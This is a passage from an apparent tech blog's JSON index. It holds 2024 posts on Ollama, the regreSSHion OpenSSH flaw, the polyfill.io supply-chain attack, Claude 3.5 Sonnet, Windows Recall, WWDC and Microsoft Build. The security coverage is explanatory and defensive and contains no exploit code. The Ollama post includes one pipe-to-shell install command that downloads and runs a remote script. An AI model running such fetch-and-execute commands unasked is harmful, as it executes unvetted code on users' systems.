infrastructure is a docker run command. 
I\u0026rsquo;ve been experimenting with running it as a sidecar service in our development Kubernetes cluster, giving the whole team access to a shared local model without any API keys or external dependencies.\nThe Limitations Are Real # I want to be honest about where local models fall short. For complex reasoning, multi-step problem solving, or generating large amounts of novel code, the frontier API models are still meaningfully better. The 7B and 13B parameter models that run comfortably on consumer hardware are impressive for their size, but they\u0026rsquo;re not magic. They hallucinate more, lose context faster, and struggle with nuanced instructions.\nThe hardware requirements also create an accessibility gap. Running a useful model requires a decent GPU — realistically 8GB+ VRAM for the smaller models and 16GB+ for anything larger. That\u0026rsquo;s not unusual for a developer workstation in 2024, but it\u0026rsquo;s not universal either. CPU-only inference works but is painfully slow for anything interactive.\nMy Take # I think we\u0026rsquo;re at an inflection point for local AI tooling. Ollama has done for local LLMs what Docker did for containers — taken something that was technically possible but operationally painful and made it accessible. The models aren\u0026rsquo;t going to replace cloud APIs for everything, but they don\u0026rsquo;t need to. They need to be good enough for the 80% of daily tasks where privacy, latency, and cost matter more than peak capability.\nMy current setup is hybrid: local Ollama for code completion, quick lookups, and data processing tasks that involve sensitive code, with a cloud API for the complex reasoning tasks that justify the cost and latency. It\u0026rsquo;s the best of both worlds, and I suspect this pattern will become the default for most development teams within a year.\nIf you haven\u0026rsquo;t tried Ollama yet, set aside thirty minutes this week. 
curl -fsSL https://ollama.com/install.sh | sh and then ollama pull llama3. You might be surprised at how useful it is.\n","date":"11 July 2024","externalUrl":null,"permalink":"/posts/240711-ollama-local-llm-revolution/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Local LLM tooling has matured rapidly, with Ollama leading the charge. Here’s why self-hosted AI is becoming a serious option for developers.","title":"Ollama and the Rise of Local LLMs — Why Running AI on Your Own Hardware Matters","type":"posts"},{"content":"If you run Linux servers — and let\u0026rsquo;s be honest, who among us doesn\u0026rsquo;t — you need to pay attention to CVE-2024-6387, disclosed this week by Qualys. Dubbed \u0026ldquo;regreSSHion,\u0026rdquo; this vulnerability is a signal handler race condition in OpenSSH\u0026rsquo;s server that can lead to unauthenticated remote code execution as root. Yes, you read that correctly. Unauthenticated. Root. On the thing that guards the front door to virtually every server on the internet.\nWhat Makes regreSSHion Different # We\u0026rsquo;ve seen OpenSSH vulnerabilities before, but this one carries a particular sting. The underlying bug is a regression of CVE-2006-5051, a vulnerability that was patched eighteen years ago. Somewhere along the way — specifically in OpenSSH 8.5p1, released in March 2021 — a code change accidentally reintroduced the vulnerable condition. The race condition sits in the SIGALRM handler during authentication timeout processing, where async-signal-unsafe functions like syslog() get called in a signal handler context.\nFor those of us who\u0026rsquo;ve written C for decades, signal handler safety is one of those lessons you learn early and respect forever. The list of async-signal-safe functions is deliberately short for a reason. 
When a signal handler calls malloc() or free() indirectly through logging functions, you\u0026rsquo;re playing with fire in the form of heap corruption.\nThe Scope of Exposure # OpenSSH versions from 8.5p1 through 9.7p1 are affected if running on glibc-based Linux systems. That\u0026rsquo;s a lot of servers. Qualys identified approximately 14 million potentially vulnerable OpenSSH instances exposed to the internet through Shodan and Censys searches. The practical exploitation difficulty is non-trivial — the Qualys team reportedly needed around 10,000 connection attempts on average to win the race on a 32-bit system, and 64-bit exploitation with ASLR is considerably harder. But \u0026ldquo;hard to exploit\u0026rdquo; and \u0026ldquo;impossible to exploit\u0026rdquo; are very different things, especially when the payoff is root access.\nThe versions before 4.4p1 are also vulnerable unless they were patched for the original CVE-2006-5051. OpenBSD is explicitly not affected due to its secure signal handling mechanisms — something the OpenBSD team has quietly gotten right for years.\nPatching and Mitigation # OpenSSH 9.8p1, released on July 1, fixes the vulnerability. If you can\u0026rsquo;t patch immediately, setting LoginGraceTime 0 in your sshd_config eliminates the race condition by disabling the authentication timeout. The trade-off is that this makes your server susceptible to denial-of-service through connection exhaustion, as unauthenticated sessions will never time out. It\u0026rsquo;s not ideal, but it\u0026rsquo;s better than RCE.\nFor those running configuration management — Ansible, Puppet, Chef, or whatever your shop prefers — this is the moment where having automated patching pipelines pays for itself. I had our staging environments patched within two hours of the advisory going public, and production followed after a quick smoke test. 
If you\u0026rsquo;re still SSH-ing into boxes manually to run apt upgrade, I\u0026rsquo;d argue this CVE is your sign to invest in automation.\nThe Regression Problem # What really gets me about regreSSHion isn\u0026rsquo;t the vulnerability itself — it\u0026rsquo;s the regression. We fixed this class of bug in 2006. Someone (and I\u0026rsquo;m not pointing fingers at any individual contributor) made a change in 2021 that undid that fix, and it took three years for anyone to catch it.\nThis is a systemic problem in software maintenance. Regression testing for security properties is genuinely hard. A unit test might verify that authentication works correctly, but how do you automatically test that a signal handler doesn\u0026rsquo;t call async-signal-unsafe functions? Static analysis tools can catch some of these patterns, but they generate enough false positives in large C codebases that findings get ignored.\nI\u0026rsquo;ve been bitten by similar regressions in my own projects over the years, though thankfully never with stakes this high. The lesson I keep relearning: when you fix a security bug, write a comment explaining why the code must remain this way, and if possible, add a test that will scream if someone changes it.\nMy Take # The OpenSSH project remains one of the most impressive pieces of security-critical open source software in existence. One regression in eighteen years, in software that runs on effectively every Linux server on the planet, is a remarkable track record. But this CVE is a reminder that even the best projects need more eyes, more static analysis, and more paranoia about regression.\nIf you\u0026rsquo;re a sysadmin or DevOps engineer reading this on a holiday week, I\u0026rsquo;m sorry — go patch your servers. If you\u0026rsquo;re a developer, take a moment to look at your own signal handling code. And if you\u0026rsquo;re running OpenSSH on OpenBSD, enjoy your long weekend.\nPatch, verify, and update your inventories. 
This one matters.\n","date":"4 July 2024","externalUrl":null,"permalink":"/posts/240704-regresshion-openssh-vulnerability/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CVE-2024-6387 reveals a critical remote code execution flaw in OpenSSH, and it’s a regression from a fix made back in 2006.","title":"regreSSHion — A Wake-Up Call Hiding in Plain Sight","type":"posts"},{"content":"If you\u0026rsquo;re running a website that includes a script tag pointing to cdn.polyfill.io, stop reading this and remove it immediately. Seriously. The polyfill.io domain — which has been serving JavaScript polyfills to over 100,000 websites — was acquired by a Chinese company called Funnull earlier this year, and this week security researchers at Sansec confirmed that the domain is now injecting malicious code into websites. The code redirects mobile users to scam sites using a sophisticated detection mechanism that avoids triggering on admin browsers, web crawlers, or analytics tools.\nThis is one of the most impactful supply chain attacks we\u0026rsquo;ve seen in the web ecosystem, and it highlights a fundamental problem with how we\u0026rsquo;ve been building websites for over a decade.\nWhat Happened # Polyfill.io was originally created by Andrew Betts at the Financial Times as an open-source service. It served JavaScript polyfills — compatibility code that adds modern browser features to older browsers. The service was simple and useful: include one script tag, and your site would automatically serve the right polyfills based on the visitor\u0026rsquo;s browser. At its peak, polyfill.io was used by over 100,000 websites.\nIn February 2024, the polyfill.io domain and associated GitHub account were acquired by a company called Funnull, which operates a CDN primarily serving Chinese markets. Andrew Betts immediately warned on social media that he had no involvement with the sale and recommended removing the dependency. 
Cloudflare and Fastly both set up alternative endpoints to serve polyfills safely.\nDespite these warnings, tens of thousands of sites continued loading scripts from cdn.polyfill.io. This week, Sansec\u0026rsquo;s analysis confirmed the worst-case scenario: the domain is now serving modified JavaScript that includes malicious code. The injected code is sophisticated — it only activates on mobile devices, uses timing-based delays to avoid detection, and specifically avoids executing when it detects web analytics tools, ad tech platforms, or known web crawlers.\nThe Technical Details # The malicious code injection is cleverly implemented. The polyfill.io CDN still serves legitimate polyfill code, but periodically injects additional JavaScript that:\nFingerprints the visitor: checks the User-Agent string for mobile browsers, specifically targeting Android devices Avoids detection: checks for the presence of analytics tools (Google Analytics, Google Tag Manager), web crawlers (Googlebot), and developer tools before activating Uses timing obfuscation: delays execution and only triggers on certain page loads, making it harder to reproduce consistently Redirects to scam sites: sends mobile users to fake Google Analytics domains that lead to sports betting and other scam sites The sophistication of the evasion techniques means that most automated monitoring tools wouldn\u0026rsquo;t catch the injection. If you\u0026rsquo;re testing your site from a desktop browser with developer tools open, the malicious code deliberately doesn\u0026rsquo;t execute. This is social engineering at the infrastructure level.\nThe Deeper Problem: CDN Trust # This attack exploits a fundamental weakness in web architecture: the implicit trust we place in third-party script sources. 
When you include a \u0026lt;script src=\u0026quot;https://cdn.example.com/library.js\u0026quot;\u0026gt; tag in your HTML, you\u0026rsquo;re giving that domain the ability to execute arbitrary code in your users\u0026rsquo; browsers. If that domain changes hands, serves compromised code, or is hijacked, you have no protection.\nWe\u0026rsquo;ve known about this risk theoretically for years, but polyfill.io makes the risk tangible. Here\u0026rsquo;s why this particular case is so concerning:\nScale: Over 100,000 websites affected, including major brands that should know better.\nLegitimacy of origin: This wasn\u0026rsquo;t a typosquatting attack or a compromised package. It was the legitimate, original domain that developers had intentionally included.\nDomain ownership transfer: The attack vector wasn\u0026rsquo;t technical — it was a business transaction. Someone bought the domain and its associated trust.\nWarning ignored: The original author explicitly warned the community months before the malicious code appeared, and thousands of sites still didn\u0026rsquo;t act.\nWhat You Should Do Right Now # If you maintain any websites, here\u0026rsquo;s your immediate action plan:\nAudit your script tags. Search your HTML templates, CMS themes, and build output for any references to polyfill.io. Remove them immediately.\nAssess if you even need polyfills. In 2024, the browsers that needed polyfills (mainly IE 11 and older) are effectively extinct. Most modern browsers support ES6+ features natively. Check caniuse.com for your target features — you probably don\u0026rsquo;t need polyfills at all anymore.\nIf you genuinely need polyfills, use Cloudflare\u0026rsquo;s alternative at cdnjs.cloudflare.com/polyfill/ or Fastly\u0026rsquo;s at polyfill-fastly.io. Better yet, bundle them with your build process so you control the code.\nImplement Subresource Integrity (SRI). For any third-party script you do load, use the integrity attribute on your script tags. 
This ensures the browser only executes the script if its hash matches what you expect. SRI wouldn\u0026rsquo;t have prevented the initial compromise if the polyfill code was dynamically generated per-request (which it was), but it\u0026rsquo;s a critical defense for static CDN resources.\nUse Content Security Policy (CSP) headers. Restrict which domains can serve executable scripts on your pages. This limits the blast radius of any single compromised CDN.\nMonitor your dependencies. Set up automated scanning for your production sites that checks for unexpected script sources or content changes.\nMy Take # This incident frustrates me because it was entirely preventable. Not just the attack itself, but the vulnerability pattern. I\u0026rsquo;ve been arguing for years that loading JavaScript from domains you don\u0026rsquo;t control is an underappreciated risk. The convenience of CDN-hosted libraries comes with an implicit trust relationship that most developers never think about.\nThe web development community has done excellent work on package-level supply chain security — lockfiles, audit tools, dependency scanning. But we\u0026rsquo;ve largely ignored the CDN layer, treating it as a networking optimization rather than a security boundary. Polyfill.io proves that the domain serving your scripts is as critical as the code in your node_modules.\nThe uncomfortable truth is that this attack was successful not because of technical sophistication but because of organizational inertia. Warnings went out in February. The attack was confirmed in June. Four months of clear, public warnings, and over 100,000 sites were still vulnerable. That\u0026rsquo;s not a technology problem — it\u0026rsquo;s a process problem.\nIf there\u0026rsquo;s one takeaway from this incident, it\u0026rsquo;s this: treat every third-party script source as a dependency that can be compromised, and minimize them accordingly. 
Self-host what you can, use SRI for what you can\u0026rsquo;t, and maintain an inventory of every external domain your site trusts with code execution. The web\u0026rsquo;s trust model is fragile, and this week proved it.\n","date":"27 June 2024","externalUrl":null,"permalink":"/posts/240627-polyfill-io-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The polyfill.io domain was acquired by a Chinese company and began injecting malware into over 100,000 websites, exposing fundamental weaknesses in how we trust third-party CDN dependencies.","title":"The Polyfill.io Supply Chain Attack — A Wake-Up Call for CDN Trust","type":"posts"},{"content":"The AI model landscape just shifted again. Today, Anthropic released Claude 3.5 Sonnet, and the benchmarks are turning heads. The mid-tier model in their lineup is outperforming GPT-4o on most coding benchmarks while running at twice the speed and one-fifth the cost of their previous top model, Claude 3 Opus. For those of us who use LLMs as daily development tools, this isn\u0026rsquo;t just another incremental update — it\u0026rsquo;s a meaningful shift in what\u0026rsquo;s available.\nThe Numbers That Matter # Let\u0026rsquo;s start with the benchmarks that are most relevant to developers. On HumanEval, the standard coding benchmark, Claude 3.5 Sonnet scores 92.0% — surpassing GPT-4o\u0026rsquo;s 90.2%. On the graduate-level reasoning benchmark (GPQA), it hits 59.4%, compared to GPT-4o\u0026rsquo;s 53.6%. But the benchmark that caught my eye is the internal \u0026ldquo;agentic coding\u0026rdquo; evaluation Anthropic shared, where Claude 3.5 Sonnet solved 64% of problems compared to Claude 3 Opus at 38%.\nBenchmarks are always somewhat synthetic, and I\u0026rsquo;ve been in this field long enough to know that real-world performance often diverges from leaderboard scores. But the early anecdotal evidence from developers aligns with these numbers. 
Multi-file refactoring tasks, understanding complex codebases, and generating tests all seem measurably improved.\nThe speed improvement is equally important. Sonnet operates at roughly twice the token throughput of Opus, which means faster completions in interactive coding sessions. When you\u0026rsquo;re using an AI assistant in your IDE, the difference between a 3-second and a 6-second response significantly affects your flow state. I\u0026rsquo;ve been feeling this friction with Opus for a while — capable but slow enough to break concentration.\nArtifacts: Rethinking the Chat Interface # Alongside the model release, Anthropic introduced Artifacts — a new feature in the Claude interface that renders generated content in a dedicated panel alongside the conversation. When you ask Claude to write code, create a document, or build a simple application, the output appears in an interactive preview that you can iterate on.\nThis might sound like a UI detail, but it represents a shift in how we interact with AI coding assistants. Instead of copying code from a chat window into your editor, you get a live preview that you can modify and refine within the conversation. For quick prototyping, creating utility scripts, or building proof-of-concept applications, this workflow is remarkably efficient.\nI spent an hour today building a data visualization dashboard through Artifacts — describing what I wanted, seeing it rendered immediately, and iterating on the design through conversation. The entire process from concept to working prototype took about 20 minutes. That same task would have taken me half a day with traditional development, including the inevitable fiddling with chart library documentation.\nThe Competitive Landscape Shifts # What makes this release strategically significant is the pricing model. Claude 3.5 Sonnet is priced at $3 per million input tokens and $15 per million output tokens — the same as Claude 3 Sonnet, their previous mid-tier model. 
You\u0026rsquo;re getting performance that exceeds the previous flagship at the mid-tier price point. Anthropic is effectively making top-tier AI coding assistance significantly more accessible.\nThis creates real competitive pressure on OpenAI. GPT-4o is priced similarly, but if Claude 3.5 Sonnet consistently outperforms it on coding tasks, developers building AI-powered tools will start defaulting to Anthropic\u0026rsquo;s API. The downstream effects on products like Cursor, Cody, and other AI coding tools could be significant — many of these tools offer model selection, and users will gravitate toward better results.\nGoogle\u0026rsquo;s Gemini 1.5 Pro is also in this competitive mix, and its million-token context window gives it unique advantages for large codebase analysis. But on pure code generation quality, Claude 3.5 Sonnet appears to have the edge right now.\nWhat This Means for Developer Workflows # I\u0026rsquo;ve been using AI coding assistants since the early days of Copilot, and I\u0026rsquo;ve watched the capability curve closely. We\u0026rsquo;re reaching a point where these tools are genuinely useful for substantive programming tasks, not just autocomplete. Specific areas where I\u0026rsquo;m seeing real productivity gains with this class of model:\nCode review and refactoring. Point Claude 3.5 Sonnet at a messy function and ask it to refactor with specific constraints (maintain the API, improve error handling, add typing). The suggestions are increasingly production-quality.\nTest generation. Describe the edge cases you\u0026rsquo;re worried about, and the model generates comprehensive test suites that actually catch bugs. This has been a weak point of earlier models, but the improvement is notable.\nDocumentation. Generating accurate docstrings, README files, and API documentation from code. The model understands intent well enough that the documentation reads naturally, not like machine-generated boilerplate.\nDebugging complex issues. 
Paste in a stack trace, relevant code, and a description of the expected behavior. The diagnostic reasoning is significantly better than previous models — it considers multiple hypotheses and asks clarifying questions.\nThe 200K context window (same as Claude 3 Opus) means you can feed substantial portions of a codebase into a single conversation. For understanding how a change propagates through a system, this is invaluable.\nMy Take # The AI coding assistant space is maturing faster than I expected. Six months ago, I was treating these tools as useful-but-unreliable helpers that needed constant verification. With Claude 3.5 Sonnet, I\u0026rsquo;m starting to trust the output enough to use it for more critical tasks — still with review, but with less overhead.\nWhat I find most interesting is the business model dynamic. Anthropic is releasing what is arguably the best coding AI available, at mid-tier pricing. This pushes the entire market toward making top-tier AI accessible to individual developers and small teams, not just enterprises with large API budgets.\nThe real question is sustainability. Training and serving these models is extraordinarily expensive, and the pricing suggests companies are prioritizing market share over margins. That race benefits developers in the short term, but I wonder about the long-term equilibrium.\nFor now, though, if you\u0026rsquo;re a developer not yet using AI assistance in your workflow, Claude 3.5 Sonnet might be the model that changes your mind. The quality-to-cost ratio has crossed a threshold that makes it practical for daily use, not just occasional experimentation. I\u0026rsquo;ve updated my default model in every tool that offers the choice. 
The improvement is that clear.\n","date":"20 June 2024","externalUrl":null,"permalink":"/posts/240620-claude-35-sonnet-raises-the-bar/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic releases Claude 3.5 Sonnet, which benchmarks above GPT-4o on coding tasks while running faster and cheaper — reshaping the competitive landscape for AI-assisted development.","title":"Claude 3.5 Sonnet — Anthropic Raises the Bar for Coding AI","type":"posts"},{"content":"Two weeks ago, I wrote about Microsoft Build 2024 and flagged Windows Recall as a feature that raised serious security concerns. This week, those concerns were validated in dramatic fashion. Security researcher Kevin Beaumont published findings showing that Recall\u0026rsquo;s database — which stores screenshots of everything you do on your PC — was stored in plain text, accessible to any application running on the machine. Microsoft has now delayed the feature, pulling it from the upcoming Copilot+ PC launch and moving it to a Windows Insider preview instead.\nThis is a rare case where the security community\u0026rsquo;s pushback actually changed a major product launch timeline. And there are important lessons here for all of us building software.\nWhat Went Wrong # The core issue was almost embarrassingly basic. Recall continuously captured screenshots, ran them through OCR and semantic analysis on the NPU, and stored the results in a local SQLite database. That database was supposed to be protected, but Beaumont demonstrated that it was stored in the user\u0026rsquo;s AppData folder in plain text. Any process running under the user\u0026rsquo;s context — including malware — could simply read the entire database without elevated privileges.\nLet that sink in: a feature designed to create a complete, searchable record of everything you\u0026rsquo;ve ever viewed on your computer stored that data in a way that any malicious application could trivially exfiltrate. 
We\u0026rsquo;re talking about screenshots of banking sessions, password managers, private messages, medical records, confidential documents — all indexed and searchable, sitting in an unencrypted SQLite file.\nSecurity researcher Alex Hagenah went a step further and released TotalRecall, a proof-of-concept tool that could extract and display the Recall database contents. The tool worked exactly as you\u0026rsquo;d expect — because there was essentially no security barrier to overcome.\nThe Response # To Microsoft\u0026rsquo;s credit, the response was relatively swift. On June 7, they committed to several changes: Recall would be opt-in rather than on by default, Windows Hello biometric authentication would be required to access the timeline, and the database would be encrypted with keys tied to the device\u0026rsquo;s TPM. Then, on June 13, they announced that Recall would be pulled from the Copilot+ PC launch scheduled for June 18 and moved to the Windows Insider Program.\nThese are all improvements that should have been in the original design. The fact that they weren\u0026rsquo;t suggests that the feature was rushed through development without adequate security review — likely driven by competitive pressure to show AI capabilities at Build.\nPavan Davuluri, Microsoft\u0026rsquo;s head of Windows, framed the delay as wanting to ensure a \u0026ldquo;trusted experience.\u0026rdquo; That\u0026rsquo;s the right instinct, but it raises the question: why wasn\u0026rsquo;t this the starting point?\nThe Deeper Problem: AI Feature Velocity vs. Security # This incident illustrates a tension that I think will define the next few years of software development. Companies are under enormous pressure to ship AI features quickly. The competitive landscape is moving at a pace I haven\u0026rsquo;t seen since the early days of the web. 
But AI features often handle sensitive data in new ways — and the security implications of those new data flows aren\u0026rsquo;t always obvious during the feature design phase.\nRecall is a perfect case study. The feature concept makes sense: use AI to create a searchable memory of your computing activity. But the implementation requires creating what is essentially the most sensitive data store on any consumer device. That store needs to be treated with the same level of security architecture as a credential manager or disk encryption system — not as a regular application database.\nI\u0026rsquo;ve been involved in security architecture reviews for decades, and the pattern is familiar. A product team builds an exciting feature, security review happens too late in the cycle (or not thoroughly enough), and the result ships with fundamental design flaws. The difference now is that AI features tend to aggregate and process data in ways that amplify the impact of any security failure.\nLessons for Developers # If you\u0026rsquo;re building applications that integrate AI features — and increasingly, most of us are — this incident offers concrete lessons:\nThreat model your data stores early. Before you write a line of code, ask: what\u0026rsquo;s the worst thing that happens if this data is fully compromised? If the answer is \u0026ldquo;catastrophic,\u0026rdquo; design your security architecture first.\nDefault to encrypted, not plaintext. In 2024, there\u0026rsquo;s no excuse for storing sensitive data in unencrypted SQLite databases. Use platform encryption APIs, tie keys to hardware security modules (TPM, Secure Enclave), and require authentication for access.\nOpt-in for sensitive features. Recall was originally going to be enabled by default. For any feature that captures, stores, or processes sensitive user data in new ways, the ethical and practical default is opt-in with clear disclosure.\nAssume hostile local processes. 
If your application stores valuable data, assume that malware running under the same user context will try to read it. Design your access controls accordingly. Sandboxing, separate process isolation, and hardware-backed encryption are your friends.\nSecurity review before launch announcements. The awkwardness of delaying a feature after a major keynote is nothing compared to the reputational damage of shipping a security vulnerability. Build security review into your launch timeline, not after it.\nMy Take # I\u0026rsquo;m actually somewhat optimistic about this outcome. Yes, the original Recall implementation was a security failure. But the fact that Microsoft responded to community feedback and delayed the launch — rather than shipping and patching later — suggests that the feedback mechanisms are working. This is how the industry should function: researchers identify problems, companies listen, and products improve before reaching consumers.\nThe broader lesson is that the AI gold rush doesn\u0026rsquo;t exempt anyone from security fundamentals. If anything, the novel data patterns created by AI features demand more rigorous security architecture, not less. Every developer building AI-powered features should be looking at the Recall incident as a case study in what not to do — and more importantly, as a reminder that security can\u0026rsquo;t be bolted on after the exciting demo is built.\nMicrosoft will eventually ship Recall, and hopefully with the security architecture it should have had from day one. 
In the meantime, the rest of us have a useful reminder: no matter how impressive the AI capability, the fundamentals of data protection still apply.\n","date":"13 June 2024","externalUrl":null,"permalink":"/posts/240613-microsoft-recall-delayed-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft pulls Windows Recall from the upcoming Copilot+ PC launch after security researchers demonstrate alarming vulnerabilities in the feature’s data storage.","title":"Microsoft Delays Recall — When Security Concerns Actually Win","type":"posts"},{"content":"After months of speculation about whether Apple was \u0026ldquo;behind\u0026rdquo; in the AI race, WWDC 2024 just delivered their answer: Apple Intelligence. And in typical Apple fashion, they\u0026rsquo;ve taken a fundamentally different approach than the competition. Rather than building the biggest model or the flashiest chatbot, Apple is weaving AI deeply into the operating system layer with a privacy-first architecture that leverages on-device processing wherever possible — and a new \u0026ldquo;Private Cloud Compute\u0026rdquo; infrastructure for when it can\u0026rsquo;t.\nI\u0026rsquo;ve been developing for Apple platforms since the early Mac OS days, and this feels like one of those inflection points where Apple\u0026rsquo;s integrated hardware-software approach gives them an unfair advantage.\nThe Architecture: On-Device First # The technical architecture of Apple Intelligence is what separates it from the competition. Apple is running foundation models directly on-device, taking advantage of the Neural Engine in their A17 Pro and M-series chips. 
The base models are relatively compact — Apple\u0026rsquo;s technical blog describes them as approximately 3 billion parameter models — but they\u0026rsquo;re optimized specifically for Apple Silicon using a combination of grouped-query attention, quantization techniques, and adapter-based fine-tuning.\nWhat\u0026rsquo;s clever is the adapter approach. Rather than shipping one massive model, Apple uses a smaller base model with task-specific adapters (using LoRA-style techniques) that can be loaded dynamically. Writing assistance uses one adapter, notification summarization uses another, image generation uses yet another. This keeps memory usage manageable on mobile devices while still providing specialized capabilities.\nFor developers, Apple is exposing these capabilities through new APIs. The App Intents framework gets a significant expansion, allowing Siri to take actions within third-party apps using natural language. If you\u0026rsquo;ve built proper intents for your app, Siri can now chain together actions across multiple apps to complete complex requests. This is the kind of deep OS integration that cloud-based assistants simply can\u0026rsquo;t match.\nPrivate Cloud Compute: A New Trust Model # When tasks exceed what can be handled on-device, Apple routes them to what they\u0026rsquo;re calling Private Cloud Compute — custom Apple Silicon servers running a hardened, stateless operating system. The key claims: your data is never stored on the server, Apple employees can\u0026rsquo;t access it, and the entire software stack is cryptographically verifiable by independent security researchers.\nThis is a genuinely novel approach. Rather than asking users to trust that a cloud provider won\u0026rsquo;t look at their data (the current model for every other AI assistant), Apple is building a system where the trust is architecturally enforced. The servers run a locked-down OS with no persistent storage, no remote shell access, and no logging of user requests. 
Third-party auditors can verify the code running on the servers matches what Apple publishes.\nAs someone who has worked on systems where data privacy was paramount, I appreciate this approach. It\u0026rsquo;s not perfect — you\u0026rsquo;re still trusting Apple\u0026rsquo;s silicon and firmware — but it\u0026rsquo;s a meaningful step beyond \u0026ldquo;trust us, we have a privacy policy.\u0026rdquo;\nThe ChatGPT Partnership # Perhaps the most surprising announcement was the integration of OpenAI\u0026rsquo;s ChatGPT directly into iOS 18, iPadOS 18, and macOS Sequoia. When Apple Intelligence encounters a query it can\u0026rsquo;t handle with its own models, it can offer to escalate to ChatGPT — with explicit user consent each time. No account is required, and Apple says OpenAI doesn\u0026rsquo;t store the requests or use them for training.\nThis is a pragmatic move. Apple clearly recognized that their on-device models, while capable for system-level tasks, can\u0026rsquo;t match GPT-4o for open-ended knowledge queries and complex reasoning. Rather than pretending otherwise (which would have been very un-Apple), they partnered with the market leader while maintaining their privacy principles through the consent-and-no-storage model.\nFor developers, this creates an interesting dynamic. Your app might interact with Apple\u0026rsquo;s on-device models for quick, private operations, and optionally tap into GPT-4o for more complex tasks — all through Apple\u0026rsquo;s APIs. The user experience is unified even though the backend is hybrid.\nDeveloper Implications # Beyond Apple Intelligence, WWDC brought several meaningful developer updates. Swift 6 introduces complete data-race safety checking at compile time — a significant step for concurrent programming. 
The new Swift Testing framework offers a modern, macro-based approach to unit testing that feels more natural than XCTest.\nXcode 16 gets \u0026ldquo;Predictive Code Completion\u0026rdquo; powered by a model trained specifically on Swift and Apple SDKs. Having tried it briefly during the keynote demo stream, it looks more contextually aware than generic code completion tools because it understands Apple\u0026rsquo;s frameworks deeply.\nThe Vision Pro also got meaningful updates with visionOS 2, including volumetric APIs and spatial photos generated from existing 2D images. Whether spatial computing takes off remains to be seen, but Apple is clearly committed to building out the developer platform.\nMy Take # What impresses me about Apple\u0026rsquo;s AI strategy is the restraint. In a market where everyone is racing to ship the most capable AI regardless of privacy or reliability concerns, Apple chose to ship something more limited but more trustworthy. The on-device models won\u0026rsquo;t write your novel or debug complex code, but they\u0026rsquo;ll summarize your notifications, clean up your writing, and organize your photos — tasks where reliability and privacy matter more than raw capability.\nThe Private Cloud Compute architecture is the real innovation here. If it works as described — and I expect security researchers will be testing those claims aggressively — it establishes a new standard for cloud AI privacy. Every other provider will face the question: \u0026ldquo;Why can\u0026rsquo;t you do what Apple does?\u0026rdquo;\nFor those of us building software, the message is clear: AI is becoming an OS-level capability, not just a cloud service. The apps that integrate well with Apple Intelligence through proper App Intents and system APIs will feel native and intelligent. Those that don\u0026rsquo;t will feel increasingly dated. 
Time to update those Xcode projects.\n","date":"6 June 2024","externalUrl":null,"permalink":"/posts/240606-apple-wwdc-2024-intelligence/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple Intelligence debuts at WWDC 2024 with on-device AI, a ChatGPT partnership, and a privacy-first approach that could reshape how we think about AI integration.","title":"WWDC 2024 — Apple Finally Shows Its AI Hand","type":"posts"},{"content":"Microsoft Build wrapped up last week, and if there was any doubt about where Redmond is placing its chips, those doubts are gone. This year\u0026rsquo;s developer conference was wall-to-wall AI, from the new \u0026ldquo;Copilot+ PC\u0026rdquo; category to the controversial Windows Recall feature that promises to remember everything you\u0026rsquo;ve ever done on your computer. After thirty years in this industry, I\u0026rsquo;ve seen plenty of platform shifts announced with fanfare — but this one feels like Microsoft is genuinely restructuring its entire product line around a single bet.\nCopilot+ PCs: A New Hardware Category # The headline announcement was the introduction of Copilot+ PCs — a new tier of Windows machines built around dedicated Neural Processing Units (NPUs) capable of at least 40 TOPS (trillion operations per second). Microsoft partnered with Qualcomm on the initial wave, using the Snapdragon X Elite and X Plus chips, with AMD and Intel support promised later.\nWhat\u0026rsquo;s interesting here isn\u0026rsquo;t the hardware spec itself — NPUs have been shipping in phones for years. It\u0026rsquo;s that Microsoft is now defining a minimum AI compute threshold as a platform requirement. This is a deliberate move to create a baseline that developers can target. If you know every Copilot+ PC has at least 40 TOPS of local inference capability, you can build features that depend on it.\nFor developers, this means a new class of on-device AI workloads becomes viable. 
Local inference for code completion, real-time translation, image generation — all without round-tripping to the cloud. The latency and privacy implications are significant. I\u0026rsquo;ve been running some local LLMs on my development machines, and the difference between cloud and local inference for developer tooling is night and day in terms of responsiveness.\nWindows Recall: Ambitious or Alarming? # The feature that\u0026rsquo;s generating the most debate is Windows Recall. The concept: Windows continuously takes screenshots of everything on your screen, processes them with on-device AI, and builds a searchable semantic index of your entire computing history. Want to find that restaurant someone recommended in a Teams call three weeks ago? Just search for it in natural language.\nThe technical implementation is genuinely impressive. The screenshots are processed locally using the NPU, the index is stored in an encrypted SQLite database, and Microsoft says the data never leaves your device. They\u0026rsquo;re using OCR combined with semantic understanding to make the content searchable.\nBut I have serious reservations. As someone who\u0026rsquo;s spent considerable time on security architecture, the idea of a constantly-updating database containing screenshots of everything — passwords being typed, sensitive documents, private messages — is a security researcher\u0026rsquo;s nightmare. Even if the database is encrypted at rest, it becomes a single, extraordinarily valuable target. If malware gains access to that database, or if a vulnerability in the encryption implementation surfaces, the blast radius is enormous.\nThe security community is already raising red flags, and rightfully so. I expect we\u0026rsquo;ll see significant pushback on this before the June 18 launch date.\nAzure AI Gets Deeper Integration # Beyond the consumer-facing announcements, Build 2024 brought meaningful updates for cloud developers. 
Azure AI Studio is being positioned as the central hub for building AI applications, with support for over 1,600 models from the model catalog. The new Azure AI model inference API provides a unified endpoint for interacting with different models — something that reduces the friction of switching between providers.\nGitHub Copilot Workspace was another standout. The idea is that you start from a GitHub Issue, and Copilot generates a plan, implements changes across multiple files, and lets you iterate on the result before creating a pull request. I\u0026rsquo;ve been using Copilot for over a year now, and while it\u0026rsquo;s excellent for autocomplete-style assistance, the workspace concept pushes into genuine software engineering territory — understanding requirements, planning changes, and executing across a codebase.\nThe Team Copilot features for Microsoft 365 are also worth noting. AI that can facilitate meetings, manage project tasks, and act as a collaborative agent within Teams channels. Microsoft is clearly betting that AI assistants will become as fundamental to workplace software as spell-check.\nThe Developer Platform Play # What struck me most about Build 2024 is the coherence of Microsoft\u0026rsquo;s strategy. Every announcement — from hardware NPU requirements to cloud AI APIs to developer tools — is part of a single, integrated vision. They\u0026rsquo;re building a platform where AI is the substrate, not a feature.\nThis is reminiscent of the mobile-first pivot of the early 2010s, but potentially more transformative. When Satya Nadella says \u0026ldquo;every app will be a Copilot 